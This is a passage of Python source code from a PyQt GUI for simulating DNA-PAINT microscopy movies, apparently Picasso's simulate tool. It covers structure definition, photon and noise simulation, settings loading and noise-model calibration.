self.structure3Label.show()
self.structure1.hide()
self.structure2.setText("Number of Labels")
self.structure3.setText("Diameter")
self.structure1Edit.hide()
self.structure2Edit.setValue(12)
self.structure3Edit.setText("100")
elif typeindex == 2:
self.structure1.hide()
self.structure2.hide()
self.structure3.hide()
self.structure1Edit.hide()
self.structure2Edit.hide()
self.structure3Edit.hide()
self.structure3Label.hide()
elif typeindex == 3:
self.structure1.hide()
self.structure2.hide()
self.structure3.hide()
self.structure1Edit.hide()
self.structure2Edit.hide()
self.structure3Edit.hide()
            self.structure3Label.hide()
self.changeStructDefinition()
def changeStructDefinition(self):
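        # Rebuild the structure coordinate strings (X, Y, exchange, 3D) for the
        # selected structure type, then refresh the generated positions.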
typeindex = self.structurecombo.currentIndex()
if typeindex == 0: # grid
rows = self.structure1Edit.value()
cols = self.structure2Edit.value()
spacingtxt = _np.asarray((self.structure3Edit.text()).split(","))
try:
spacingx = float(spacingtxt[0])
except ValueError:
spacingx = 1
if spacingtxt.size > 1:
try:
spacingy = float(spacingtxt[1])
except ValueError:
spacingy = 1
else:
spacingy = 1
structurexx = ""
structureyy = ""
structureex = ""
structure3d = ""
for i in range(0, rows):
for j in range(0, cols):
structurexx = structurexx + str(i * spacingx) + ","
structureyy = structureyy + str(j * spacingy) + ","
structureex = structureex + "1,"
structure3d = structure3d + "0,"
            structurexx = structurexx[:-1]
            structureyy = structureyy[:-1]
            structureex = structureex[:-1]
            structure3d = structure3d[:-1]
self.structurexxEdit.setText(structurexx)
self.structureyyEdit.setText(structureyy)
self.structureexEdit.setText(structureex)
self.structure3DEdit.setText(structure3d)
self.generatePositions()
elif typeindex == 1: # CIRCLE
labels = self.structure2Edit.value()
diametertxt = _np.asarray((self.structure3Edit.text()).split(","))
try:
diameter = float(diametertxt[0])
except ValueError:
diameter = 100
            twopi = 2 * _np.pi
circdata = _np.arange(0, twopi, twopi / labels)
xxval = _np.round(_np.cos(circdata) * diameter / 2 * 100) / 100
yyval = _np.round(_np.sin(circdata) * diameter / 2 * 100) / 100
structurexx = ""
structureyy = ""
structureex = ""
structure3d = ""
for i in range(0, xxval.size):
structurexx = structurexx + str(xxval[i]) + ","
structureyy = structureyy + str(yyval[i]) + ","
structureex = structureex + "1,"
structure3d = structure3d + "0,"
            structurexx = structurexx[:-1]
            structureyy = structureyy[:-1]
            structureex = structureex[:-1]
            structure3d = structure3d[:-1]
self.structurexxEdit.setText(structurexx)
self.structureyyEdit.setText(structureyy)
self.structureexEdit.setText(structureex)
self.structure3DEdit.setText(structure3d)
self.generatePositions()
elif typeindex == 2: # Custom
self.generatePositions()
elif typeindex == 3: # Handles
print("Handles will be displayed..")
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Escape:
self.close()
def vectorToString(self, x):
x_arrstr = _np.char.mod("%f", x)
x_str = ",".join(x_arrstr)
return x_str
def simulate(self):
exchangeroundstoSim = _np.asarray(
(self.exchangeroundsEdit.text()).split(",")
)
        exchangeroundstoSim = exchangeroundstoSim.astype(int)
noexchangecolors = len(set(exchangeroundstoSim))
exchangecolors = list(set(exchangeroundstoSim))
if self.concatExchangeEdit.checkState():
conrounds = noexchangecolors
else:
conrounds = self.conroundsEdit.value()
self.currentround += 1
if self.currentround == 1:
fileNameOld, exe = QtWidgets.QFileDialog.getSaveFileName(
self, "Save movie to..", filter="*.raw"
)
if fileNameOld:
self.fileName = fileNameOld
else:
self.currentround -= 1
else:
fileNameOld = self.fileName
if fileNameOld:
self.statusBar().showMessage(
"Set round " + str(self.currentround) + " of " + str(conrounds)
)
# READ IN PARAMETERS
# STRUCTURE
structureNo = self.structurenoEdit.value()
structureFrame = self.structureframeEdit.value()
structureIncorporation = self.structureIncorporationEdit.value()
structureArrangement = int(self.structurerandomEdit.checkState())
structureOrientation = int(
self.structurerandomOrientationEdit.checkState()
)
structurex = self.structurexxEdit.text()
structurey = self.structureyyEdit.text()
structureextxt = self.structureexEdit.text()
structure3dtxt = self.structure3DEdit.text()
# PAINT
kon = self.konEdit.value()
imagerconcentration = self.imagerconcentrationEdit.value()
taub = self.taubEdit.value()
taud = int(self.taudEdit.text())
# IMAGER PARAMETERS
psf = self.psfEdit.value()
photonrate = self.photonrateEdit.value()
photonratestd = self.photonratestdEdit.value()
photonbudget = self.photonbudgetEdit.value()
laserpower = self.laserpowerEdit.value()
photonslope = self.photonslopeEdit.value()
photonslopeStd = photonslope / STDFACTOR
if ADVANCEDMODE:
photonslopeStd = self.photonslopeStdEdit.value()
if self.photonslopemodeEdit.checkState():
photonratestd = 0
# CAMERA PARAMETERS
imagesize = self.camerasizeEdit.value()
itime = self.integrationtimeEdit.value()
frames = self.framesEdit.value()
pixelsize = self.pixelsizeEdit.value()
# NOISE MODEL
if ADVANCEDMODE:
background = int(self.backgroundframeEdit.text())
noise = int(self.noiseEdit.text())
laserc = self.lasercEdit.value()
imagerc = self.imagercEdit.value()
bgoffset = self.BgoffsetEdit.value()
equationA = self.EquationAEdit.value()
equationB = self.EquationBEdit.value()
equationC = self.EquationCEdit.value()
bgstdoffset = self.BgStdoffsetEdit.value()
else:
background = int(self.backgroundframesimpleEdit.text())
noise = _np.sqrt(background)
laserc = LASERC_DEFAULT
imagerc = IMAGERC_DEFAULT
bgoffset = BGOFFSET_DEFAULT
equationA = EQA_DEFAULT
equationB = EQB_DEFAULT
equationC = EQC_DEFAULT
bgstdoffset = BGSTDOFFSET_DEFAULT
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
self.statusBar().showMessage("Simulation started")
struct = self.newstruct
handlex = self.vectorToString(struct[0, :])
handley = self.vectorToString(struct[1, :])
handleex = self.vectorToString(struct[2, :])
handless = self.vectorToString(struct[3, :])
handle3d = self.vectorToString(struct[4, :])
mode3Dstate = int(self.mode3DEdit.checkState())
t0 = time.time()
if self.concatExchangeEdit.checkState():
                noexchangecolors = 1  # overwrite the count so the loop below runs only once
for i in range(0, noexchangecolors):
if noexchangecolors > 1:
fileName = _io.multiple_filenames(fileNameOld, i)
partstruct = struct[:, struct[2, :] == exchangecolors[i]]
elif self.concatExchangeEdit.checkState():
fileName = fileNameOld
partstruct = struct[
:,
struct[2, :] == exchangecolors[self.currentround - 1],
]
else:
fileName = fileNameOld
partstruct = struct[:, struct[2, :] == exchangecolors[0]]
self.statusBar().showMessage("Distributing photons ...")
bindingsitesx = partstruct[0, :]
nosites = len(
bindingsitesx
) # number of binding sites in image
                photondist = _np.zeros((nosites, frames), dtype=int)
                spotkinetics = _np.zeros((nosites, 4), dtype=float)
timetrace = {}
for i in range(0, nosites):
p_temp, t_temp, k_temp = simulate.distphotons(
partstruct,
itime,
frames,
taud,
taub,
photonrate,
photonratestd,
photonbudget,
)
photondist[i, :] = p_temp
spotkinetics[i, :] = k_temp
timetrace[i] = self.vectorToString(t_temp)
outputmsg = (
"Distributing photons ... "
+ str(_np.round(i / nosites * 1000) / 10)
+ " %"
)
self.statusBar().showMessage(outputmsg)
                    self.mainpbar.setValue(int(_np.round(i / nosites * 1000) / 10))
self.statusBar().showMessage("Converting to image ... ")
onevents = self.vectorToString(spotkinetics[:, 0])
localizations = self.vectorToString(spotkinetics[:, 1])
meandarksim = self.vectorToString(spotkinetics[:, 2])
meanbrightsim = self.vectorToString(spotkinetics[:, 3])
movie = _np.zeros(shape=(frames, imagesize, imagesize))
info = {
"Generated by": "Picasso simulate",
"Byte Order": "<",
"Camera": "Simulation",
"Data Type": "uint16",
"Frames": frames,
"Structure.Frame": structureFrame,
"Structure.Number": structureNo,
"Structure.StructureX": structurex,
"Structure.StructureY": structurey,
"Structure.StructureEx": structureextxt,
"Structure.Structure3D": structure3dtxt,
"Structure.HandleX": handlex,
"Structure.HandleY": handley,
"Structure.HandleEx": handleex,
"Structure.Handle3d": handle3d,
"Structure.HandleStruct": handless,
"Structure.Incorporation": structureIncorporation,
"Structure.Arrangement": structureArrangement,
"Structure.Orientation": structureOrientation,
"Structure.3D": mode3Dstate,
"Structure.CX": self.cx,
"Structure.CY": self.cy,
"PAINT.k_on": kon,
"PAINT.imager": imagerconcentration,
"PAINT.taub": taub,
"Imager.PSF": psf,
"Imager.Photonrate": photonrate,
"Imager.Photonrate Std": photonratestd,
"Imager.Constant Photonrate Std": int(
self.photonslopemodeEdit.checkState()
),
"Imager.Photonbudget": photonbudget,
"Imager.Laserpower": laserpower,
"Imager.Photonslope": photonslope,
"Imager.PhotonslopeStd": photonslopeStd,
"Imager.BackgroundLevel": self.backgroundlevelEdit.value(),
"Camera.Image Size": imagesize,
"Camera.Integration Time": itime,
"Camera.Frames": frames,
"Camera.Pixelsize": pixelsize,
"Noise.Lasercoefficient": laserc,
"Noise.Imagercoefficient": imagerc,
"Noise.EquationA": equationA,
"Noise.EquationB": equationB,
"Noise.EquationC": equationC,
"Noise.BackgroundOff": bgoffset,
"Noise.BackgroundStdOff": bgstdoffset,
"Spotkinetics.ON_Events": onevents,
"Spotkinetics.Localizations": localizations,
"Spotkinetics.MEAN_DARK": meandarksim,
"Spotkinetics.MEAN_BRIGHT": meanbrightsim,
"Height": imagesize,
"Width": imagesize,
}
                if conrounds != 1:
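                    # Multi-round mode: each call adds this round's photons to
                    # self.movie; noise is added and the movie written to disk
                    # only once the final round has been simulated.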
app = QtCore.QCoreApplication.instance()
for runner in range(0, frames):
movie[runner, :, :] = simulate.convertMovie(
runner,
photondist,
partstruct,
imagesize,
frames,
psf,
photonrate,
background,
noise,
mode3Dstate,
self.cx,
self.cy,
)
outputmsg = (
"Converting to Image ... "
+ str(_np.round(runner / frames * 1000) / 10)
+ " %"
)
self.statusBar().showMessage(outputmsg)
                        self.mainpbar.setValue(
                            int(_np.round(runner / frames * 1000) / 10)
                        )
app.processEvents()
if self.currentround == 1:
self.movie = movie
else:
movie = movie + self.movie
self.movie = movie
self.statusBar().showMessage(
"Converting to image ... complete. Current round: "
+ str(self.currentround)
+ " of "
+ str(conrounds)
+ ". Please set and start next round."
)
if self.currentround == conrounds:
self.statusBar().showMessage(
"Adding noise to movie ..."
)
movie = simulate.noisy_p(movie, background)
movie = simulate.check_type(movie)
self.statusBar().showMessage("Saving movie ...")
simulate.saveMovie(fileName, movie, info)
self.statusBar().showMessage(
"Movie saved to: " + fileName
)
dt = time.time() - t0
self.statusBar().showMessage(
"All computations finished. Last file saved to: "
+ fileName
+ ". Time elapsed: {:.2f} Seconds.".format(dt)
)
self.currentround = 0
else: # just save info file
# self.statusBar().showMessage('Saving yaml ...')
info_path = (
_ospath.splitext(fileName)[0]
+ "_"
+ str(self.currentround)
+ ".yaml"
)
_io.save_info(info_path, [info])
if self.exportkinetics.isChecked():
# Export the kinetic data if this is checked
kinfo_path = (
_ospath.splitext(fileName)[0]
+ "_"
+ str(self.currentround)
+ "_kinetics.yaml"
)
_io.save_info(kinfo_path, [timetrace])
self.statusBar().showMessage(
"Movie saved to: " + fileName
)
else:
app = QtCore.QCoreApplication.instance()
for runner in range(0, frames):
movie[runner, :, :] = simulate.convertMovie(
runner,
photondist,
partstruct,
imagesize,
frames,
psf,
photonrate,
background,
noise,
mode3Dstate,
self.cx,
self.cy,
)
outputmsg = (
"Converting to Image ... "
+ str(_np.round(runner / frames * 1000) / 10)
+ " %"
)
self.statusBar().showMessage(outputmsg)
                        self.mainpbar.setValue(
                            int(_np.round(runner / frames * 1000) / 10)
                        )
app.processEvents()
movie = simulate.noisy_p(movie, background)
movie = simulate.check_type(movie)
self.mainpbar.setValue(100)
self.statusBar().showMessage(
"Converting to image ... complete."
)
self.statusBar().showMessage("Saving movie ...")
simulate.saveMovie(fileName, movie, info)
if self.exportkinetics.isChecked():
# Export the kinetic data if this is checked
kinfo_path = (
_ospath.splitext(fileName)[0] + "_kinetics.yaml"
)
_io.save_info(kinfo_path, [timetrace])
self.statusBar().showMessage("Movie saved to: " + fileName)
dt = time.time() - t0
self.statusBar().showMessage(
"All computations finished. Last file saved to: "
+ fileName
+ ". Time elapsed: {:.2f} Seconds.".format(dt)
)
self.currentround = 0
def loadSettings(self): # TODO: re-write exceptions, check key
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open yaml", filter="*.yaml"
)
if path:
info = _io.load_info(path)
self.framesEdit.setValue(info[0]["Frames"])
self.structureframeEdit.setValue(info[0]["Structure.Frame"])
self.structurenoEdit.setValue(info[0]["Structure.Number"])
self.structurexxEdit.setText(info[0]["Structure.StructureX"])
self.structureyyEdit.setText(info[0]["Structure.StructureY"])
self.structureexEdit.setText(info[0]["Structure.StructureEx"])
try:
self.structure3DEdit.setText(info[0]["Structure.Structure3D"])
self.mode3DEdit.setCheckState(info[0]["Structure.3D"])
self.cx(info[0]["Structure.CX"])
self.cy(info[0]["Structure.CY"])
except Exception as e:
print(e)
pass
try:
self.photonslopemodeEdit.setCheckState(
info[0]["Imager.Constant Photonrate Std"]
)
except Exception as e:
print(e)
pass
try:
self.backgroundlevelEdit.setValue(
info[0]["Imager.BackgroundLevel"]
)
except Exception as e:
print(e)
pass
self.structureIncorporationEdit.setValue(
info[0]["Structure.Incorporation"]
)
self.structurerandomEdit.setCheckState(
info[0]["Structure.Arrangement"]
)
self.structurerandomOrientationEdit.setCheckState(
info[0]["Structure.Orientation"]
)
self.konEdit.setValue(info[0]["PAINT.k_on"])
self.imagerconcentrationEdit.setValue(info[0]["PAINT.imager"])
self.taubEdit.setValue(info[0]["PAINT.taub"])
self.psfEdit.setValue(info[0]["Imager.PSF"])
self.photonrateEdit.setValue(info[0]["Imager.Photonrate"])
self.photonratestdEdit.setValue(info[0]["Imager.Photonrate Std"])
self.photonbudgetEdit.setValue(info[0]["Imager.Photonbudget"])
self.laserpowerEdit.setValue(info[0]["Imager.Laserpower"])
self.photonslopeEdit.setValue(info[0]["Imager.Photonslope"])
self.photonslopeStdEdit.setValue(info[0]["Imager.PhotonslopeStd"])
self.camerasizeEdit.setValue(info[0]["Camera.Image Size"])
self.integrationtimeEdit.setValue(
info[0]["Camera.Integration Time"]
)
self.framesEdit.setValue(info[0]["Camera.Frames"])
self.pixelsizeEdit.setValue(info[0]["Camera.Pixelsize"])
if ADVANCEDMODE:
self.lasercEdit.setValue(info[0]["Noise.Lasercoefficient"])
self.imagercEdit.setValue(info[0]["Noise.Imagercoefficient"])
self.BgoffsetEdit.setValue(info[0]["Noise.BackgroundOff"])
self.EquationAEdit.setValue(info[0]["Noise.EquationA"])
self.EquationBEdit.setValue(info[0]["Noise.EquationB"])
self.EquationCEdit.setValue(info[0]["Noise.EquationC"])
self.BgStdoffsetEdit.setValue(
info[0]["Noise.BackgroundStdOff"]
)
# SET POSITIONS
handlexx = _np.asarray((info[0]["Structure.HandleX"]).split(","))
handleyy = _np.asarray((info[0]["Structure.HandleY"]).split(","))
handleex = _np.asarray((info[0]["Structure.HandleEx"]).split(","))
handless = _np.asarray(
(info[0]["Structure.HandleStruct"]).split(",")
)
            handlexx = handlexx.astype(float)
            handleyy = handleyy.astype(float)
            handleex = handleex.astype(float)
            handless = handless.astype(float)
            handleex = handleex.astype(int)
            handless = handless.astype(int)
            handle3d = _np.asarray((info[0]["Structure.Handle3d"]).split(","))
            handle3d = handle3d.astype(float)
structure = _np.array(
[handlexx, handleyy, handleex, handless, handle3d]
)
self.structurecombo.setCurrentIndex(2)
self.newstruct = structure
self.plotPositions()
self.statusBar().showMessage("Settings loaded from: " + path)
def importDesign(self):
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open yaml", filter="*.yaml"
)
if path:
info = _io.load_info(path)
self.structurexxEdit.setText(info[0]["Structure.StructureX"])
self.structureyyEdit.setText(info[0]["Structure.StructureY"])
self.structureexEdit.setText(info[0]["Structure.StructureEx"])
structure3d = ""
for i in range(0, len(self.structurexxEdit.text())):
structure3d = structure3d + "0,"
self.structure3DEdit.setText(structure3d)
self.structurecombo.setCurrentIndex(2)
def readLine(self, linetxt, type="float", textmode=True):
if textmode:
line = _np.asarray((linetxt.text()).split(","))
else:
line = _np.asarray((linetxt.split(",")))
values = []
for element in line:
try:
if type == "int":
values.append(int(element))
elif type == "float":
values.append(float(element))
except ValueError:
pass
return values
def importHandles(self):
# Import structure <>
self.handles = {}
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open yaml", filter="*.yaml *.hdf5"
)
if path:
splitpath = _ospath.splitext(path)
if splitpath[-1] == ".yaml":
info = _io.load_info(path)
x = self.readLine(
info[0]["Structure.StructureX"], textmode=False
)
y = self.readLine(
info[0]["Structure.StructureY"], textmode=False
)
try:
ex = self.readLine(
info[0]["Structure.StructureEx"],
type="int",
textmode=False,
)
except Exception as e:
print(e)
ex = _np.ones_like(x)
try:
z = self.readLine(info[0]["Structure.Structure3D"])
except Exception as e:
print(e)
z = _np.zeros_like(x)
minlen = min(len(x), len(y), len(ex), len(z))
x = x[0:minlen]
y = y[0:minlen]
ex = ex[0:minlen]
z = z[0:minlen]
else:
clusters = _io.load_clusters(path)
pixelsize = self.pixelsizeEdit.value()
imagesize = self.camerasizeEdit.value()
x = clusters["com_x"]
y = clusters["com_y"]
# Align in the center of window:
x = x - _np.mean(x) + imagesize / 2
y = -(y - _np.mean(y)) + imagesize / 2
x = x * pixelsize
y = y * pixelsize
try:
z = clusters["com_z"]
except Exception as e:
print(e)
z = _np.zeros_like(x)
ex = _np.ones_like(x)
minlen = len(x)
self.handles["x"] = x
self.handles["y"] = y
self.handles["z"] = z
self.handles["ex"] = ex
# TODO: Check axis orientation
exchangecolors = list(set(self.handles["ex"]))
exchangecolorsList = ",".join(map(str, exchangecolors))
# UPDATE THE EXCHANGE COLORS IN BUTTON TO BE simulated
self.exchangeroundsEdit.setText(str(exchangecolorsList))
self.structurenoEdit.setValue(1)
self.structureMode = False
self.generatePositions()
self.statusBar().showMessage(
"A total of {} points loaded.".format(minlen)
)
def readStructure(self):
structurexx = self.readLine(self.structurexxEdit)
structureyy = self.readLine(self.structureyyEdit)
structureex = self.readLine(self.structureexEdit, "int")
structure3d = self.readLine(self.structure3DEdit)
minlen = min(
len(structureex),
len(structurexx),
len(structureyy),
len(structure3d),
)
structurexx = structurexx[0:minlen]
structureyy = structureyy[0:minlen]
structureex = structureex[0:minlen]
structure3d = structure3d[0:minlen]
return structurexx, structureyy, structureex, structure3d
def plotStructure(self):
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
noexchangecolors = len(set(structureex))
exchangecolors = list(set(structureex))
# self.figure2.suptitle('Structure [nm]')
ax1 = self.figure2.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
for i in range(0, noexchangecolors):
plotxx = []
plotyy = []
for j in range(0, len(structureex)):
if structureex[j] == exchangecolors[i]:
plotxx.append(structurexx[j])
plotyy.append(structureyy[j])
ax1.plot(plotxx, plotyy, "o")
distx = round(1 / 10 * (max(structurexx) - min(structurexx)))
disty = round(1 / 10 * (max(structureyy) - min(structureyy)))
ax1.axes.set_xlim((min(structurexx) - distx, max(structurexx) + distx))
ax1.axes.set_ylim((min(structureyy) - disty, max(structureyy) + disty))
self.canvas2.draw()
exchangecolorsList = ",".join(map(str, exchangecolors))
# UPDATE THE EXCHANGE COLORS IN BUTTON TO BE simulated
self.exchangeroundsEdit.setText(str(exchangecolorsList))
def generatePositions(self):
self.plotStructure()
pixelsize = self.pixelsizeEdit.value()
if self.structureMode:
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
structure = simulate.defineStructure(
structurexx, structureyy, structureex, structure3d, pixelsize
)
else:
structurexx = self.handles["x"]
structureyy = self.handles["y"]
structureex = self.handles["ex"]
structure3d = self.handles["z"]
structure = simulate.defineStructure(
structurexx,
structureyy,
structureex,
structure3d,
pixelsize,
mean=False,
)
number = self.structurenoEdit.value()
imageSize = self.camerasizeEdit.value()
frame = self.structureframeEdit.value()
arrangement = int(self.structurerandomEdit.checkState())
gridpos = simulate.generatePositions(
number, imageSize, frame, arrangement
)
orientation = int(self.structurerandomOrientationEdit.checkState())
incorporation = self.structureIncorporationEdit.value() / 100
exchange = 0
if self.structureMode:
self.newstruct = simulate.prepareStructures(
structure,
gridpos,
orientation,
number,
incorporation,
exchange,
)
else:
self.newstruct = simulate.prepareStructures(
structure,
_np.array([[0, 0]]),
orientation,
number,
incorporation,
exchange,
)
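        # Keep only structures whose anchor point lies inside the usable camera
        # area, i.e. at least `frame` pixels away from every image border.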
in_x = _np.logical_and(
self.newstruct[0, :] < (imageSize - frame),
self.newstruct[0, :] > frame,
)
in_y = _np.logical_and(
self.newstruct[1, :] < (imageSize - frame),
self.newstruct[1, :] > frame,
)
in_frame = _np.logical_and(in_x, in_y)
self.newstruct = self.newstruct[:, in_frame]
# self.figure1.suptitle('Positions [Px]')
ax1 = self.figure1.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
ax1.plot(self.newstruct[0, :], self.newstruct[1, :], "+")
# PLOT FRAME
ax1.add_patch(
patches.Rectangle(
(frame, frame),
imageSize - 2 * frame,
imageSize - 2 * frame,
linestyle="dashed",
edgecolor="#000000",
fill=False, # remove background
)
)
ax1.axes.set_xlim(0, imageSize)
ax1.axes.set_ylim(0, imageSize)
self.canvas1.draw()
# PLOT first structure
struct1 = self.newstruct[:, self.newstruct[3, :] == 0]
noexchangecolors = len(set(struct1[2, :]))
exchangecolors = list(set(struct1[2, :]))
self.noexchangecolors = exchangecolors
# self.figure2.suptitle('Structure [nm]')
ax1 = self.figure2.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
structurexx = struct1[0, :]
structureyy = struct1[1, :]
structureex = struct1[2, :]
structurexx_nm = _np.multiply(
structurexx - min(structurexx), pixelsize
)
structureyy_nm = _np.multiply(
structureyy - min(structureyy), pixelsize
)
for i in range(0, noexchangecolors):
plotxx = []
plotyy = []
for j in range(0, len(structureex)):
if structureex[j] == exchangecolors[i]:
plotxx.append(structurexx_nm[j])
plotyy.append(structureyy_nm[j])
ax1.plot(plotxx, plotyy, "o")
distx = round(1 / 10 * (max(structurexx_nm) - min(structurexx_nm)))
disty = round(1 / 10 * (max(structureyy_nm) - min(structureyy_nm)))
ax1.axes.set_xlim(
(min(structurexx_nm) - distx, max(structurexx_nm) + distx)
)
ax1.axes.set_ylim(
(min(structureyy_nm) - disty, max(structureyy_nm) + disty)
)
self.canvas2.draw()
def plotPositions(self):
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
pixelsize = self.pixelsizeEdit.value()
structure = simulate.defineStructure(
structurexx, structureyy, structureex, structure3d, pixelsize
)
number = self.structurenoEdit.value()
imageSize = self.camerasizeEdit.value()
frame = self.structureframeEdit.value()
arrangement = int(self.structurerandomEdit.checkState())
gridpos = simulate.generatePositions(
number, imageSize, frame, arrangement
)
orientation = int(self.structurerandomOrientationEdit.checkState())
incorporation = self.structureIncorporationEdit.value() / 100
exchange = 0
# self.figure1.suptitle('Positions [Px]')
ax1 = self.figure1.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
ax1.plot(self.newstruct[0, :], self.newstruct[1, :], "+")
# PLOT FRAME
ax1.add_patch(
patches.Rectangle(
(frame, frame),
imageSize - 2 * frame,
imageSize - 2 * frame,
linestyle="dashed",
edgecolor="#000000",
fill=False, # remove background
)
)
ax1.axes.set_xlim(0, imageSize)
ax1.axes.set_ylim(0, imageSize)
self.canvas1.draw()
# PLOT first structure
struct1 = self.newstruct[:, self.newstruct[3, :] == 0]
noexchangecolors = len(set(struct1[2, :]))
exchangecolors = list(set(struct1[2, :]))
self.noexchangecolors = exchangecolors
# self.figure2.suptitle('Structure [nm]')
ax1 = self.figure2.add_subplot(111)
ax1.cla()
#ax1.hold(True)
structurexx = struct1[0, :]
structureyy = struct1[1, :]
structureex = struct1[2, :]
structurexx_nm = _np.multiply(
structurexx - min(structurexx), pixelsize
)
structureyy_nm = _np.multiply(
structureyy - min(structureyy), pixelsize
)
for i in range(0, noexchangecolors):
plotxx = []
plotyy = []
for j in range(0, len(structureex)):
if structureex[j] == exchangecolors[i]:
plotxx.append(structurexx_nm[j])
plotyy.append(structureyy_nm[j])
ax1.plot(plotxx, plotyy, "o")
distx = round(1 / 10 * (max(structurexx_nm) - min(structurexx_nm)))
disty = round(1 / 10 * (max(structureyy_nm) - min(structureyy_nm)))
ax1.axes.set_xlim(
(min(structurexx_nm) - distx, max(structurexx_nm) + distx)
)
ax1.axes.set_ylim(
(min(structureyy_nm) - disty, max(structureyy_nm) + disty)
)
self.canvas2.draw()
def openDialog(self):
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open design", filter="*.yaml"
)
if path:
self.mainscene.loadCanvas(path)
self.statusBar().showMessage("File loaded from: " + path)
def importhdf5(self):
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open localizations", filter="*.hdf5"
)
if path:
self.readhdf5(path)
def calibrateNoise(self):
bg, bgstd, las, time, conc, ok = CalibrationDialog.setExt()
        bg = _np.asarray(bg)
        bgstd = _np.asarray(bgstd)
        las = _np.asarray(las)
        time = _np.asarray(time)
        conc = _np.asarray(conc)
x_3d = _np.array([conc, las, time])
p0 = [1, 1]
fitParamsBg, fitCovariances = curve_fit(fitFuncBg, x_3d, bg, p0)
print(" fit coefficients :\n", fitParamsBg)
# SET VALUES TO PARAMETER
self.lasercEdit.setValue(fitParamsBg[0])
self.imagercEdit.setValue(fitParamsBg[1])
x_3dStd = _np.array([las, time, bg])
p0S = [1, 1, 1]
fitParamsStd, fitCovariances = curve_fit(
fitFuncStd, x_3dStd, bgstd, p0S
)
print(" fit coefficients2:\n", fitParamsStd)
self.EquationAEdit.setValue(fitParamsStd[0])
self.EquationBEdit.setValue(fitParamsStd[1])
self.EquationCEdit.setValue(fitParamsStd[2])
# Noise model working point
figure4 = plt.figure()
# Background
bgmodel = fitFuncBg(x_3d, fitParamsBg[0], fitParamsBg[1])
ax1 = figure4.add_subplot(121)
ax1.cla()
ax1.plot(bg, bgmodel, "o")
x = _np.linspace(*ax1.get_xlim())
ax1.plot(x, x)
title = "Background Model:"
ax1.set_title(title)
# Std
bgmodelstd = fitFuncStd(
x_3dStd, fitParamsStd[0], fitParamsStd[1], fitParamsStd[2]
)
ax2 = figure4.add_subplot(122)
ax2.cla()
ax2.plot(bgstd, bgmodelstd, "o")
x = _np.linspace(*ax2.get_xlim())
ax2.plot(x, x)
title = "Background Model Std:"
ax2.set_title(title)
figure4.show()
def sigmafilter(self, data, sigmas):
        # Filter data to lie within +- `sigmas` standard deviations of the mean
sigma = _np.std(data)
mean = _np.mean(data)
datanew = data[data < (mean + sigmas * sigma)]
datanew = datanew[datanew > (mean - sigmas * sigma)]
return datanew
def readhdf5(self, path):
try:
locs, self.info = _io.load_locs(path, qt_parent=self)
except _io.NoMetadataFileError:
return
        integrationtime, ok1 = QtWidgets.QInputDialog.getText(
            self, "Input Dialog", "Enter integration time in ms:"
        )
        if ok1:
            integrationtime = int(integrationtime)
            imagerconcentration, ok2 = QtWidgets.QInputDialog.getText(
                self, "Input Dialog", "Enter imager concentration in nM:"
            )
            if ok2:
                imagerconcentration = float(imagerconcentration)
                laserpower, ok3 = QtWidgets.QInputDialog.getText(
                    self, "Input Dialog", "Enter Laserpower in mW:"
                )
                if ok3:
                    laserpower = float(laserpower)
                    cbaseline, ok4 = QtWidgets.QInputDialog.getText(
                        self, "Input Dialog", "Enter camera baseline:"
                    )
                    cbaseline = float(cbaseline)
# self.le.setText(str(text))
photons = locs["photons"]
sigmax = locs["sx"]
sigmay = locs["sy"]
bg = locs["bg"]
bg = bg - cbaseline
nosigmas = 3
photons = self.sigmafilter(photons, nosigmas)
sigmax = self.sigmafilter(sigmax, nosigmas)
sigmay = self.sigmafilter(sigmay, nosigmas)
bg = self.sigmafilter(bg, nosigmas)
figure3 = plt.figure()
# Photons
photonsmu, photonsstd = norm.fit(photons)
ax1 = figure3.add_subplot(131)
ax1.cla()
#ax1.hold(True) # TODO: Investigate again what this causes
                    ax1.hist(photons, bins=25, density=True, alpha=0.6)
xmin, xmax = plt.xlim()
x = _np.linspace(xmin, xmax, 100)
p = norm.pdf(x, photonsmu, photonsstd)
ax1.plot(x, p)
title = "Photons:\n mu = %.2f\n std = %.2f" % (
photonsmu,
photonsstd,
)
ax1.set_title(title)
# Sigma X & Sigma Y
sigma = _np.concatenate((sigmax, sigmay), axis=0)
sigmamu, sigmastd = norm.fit(sigma)
ax2 = figure3.add_subplot(132)
ax2.cla()
#ax2.hold(True)
                    ax2.hist(sigma, bins=25, density=True, alpha=0.6)
xmin, xmax = plt.xlim()
x = _np.linspace(xmin, xmax, 100)
p = norm.pdf(x, sigmamu, sigmastd)
ax2.plot(x, p)
title = "PSF:\n mu = %.2f\n std = %.2f" % (
sigmamu,
sigmastd,
)
ax2.set_title(title)
# Background
bgmu, bgstd = norm.fit(bg)
ax3 = figure3.add_subplot(133)
ax3.cla()
#ax3.hold(True)
# Plot the histogram.
                    ax3.hist(bg, bins=25, density=True, alpha=0.6)
xmin, xmax = plt.xlim()
x = _np.linspace(xmin, xmax, 100)
p = norm.pdf(x, bgmu, bgstd)
ax3.plot(x, p)
title = "Background:\n mu = %.2f\n std = %.2f" % (
bgmu,
bgstd,
)
ax3.set_title(title)
figure3.tight_layout()
figure3.show()
# Calculate Rates
# Photonrate, Photonrate Std, PSF
                    photonrate = int(photonsmu / integrationtime)
                    photonratestd = int(photonsstd / integrationtime)
                    psf = int(sigmamu * 100) / 100
# CALCULATE BG AND BG_STD FROM MODEL AND ADJUST OFFSET
laserc = self.lasercEdit.value()
imagerc = self.imagercEdit.value()
bgmodel = (
(laserc + imagerc * imagerconcentration)
* laserpower
* integrationtime
)
equationA = self.EquationAEdit.value()
equationB = self.EquationBEdit.value()
equationC = self.EquationCEdit.value()
bgmodelstd = (
equationA * laserpower * integrationtime
+ equationB * bgmu
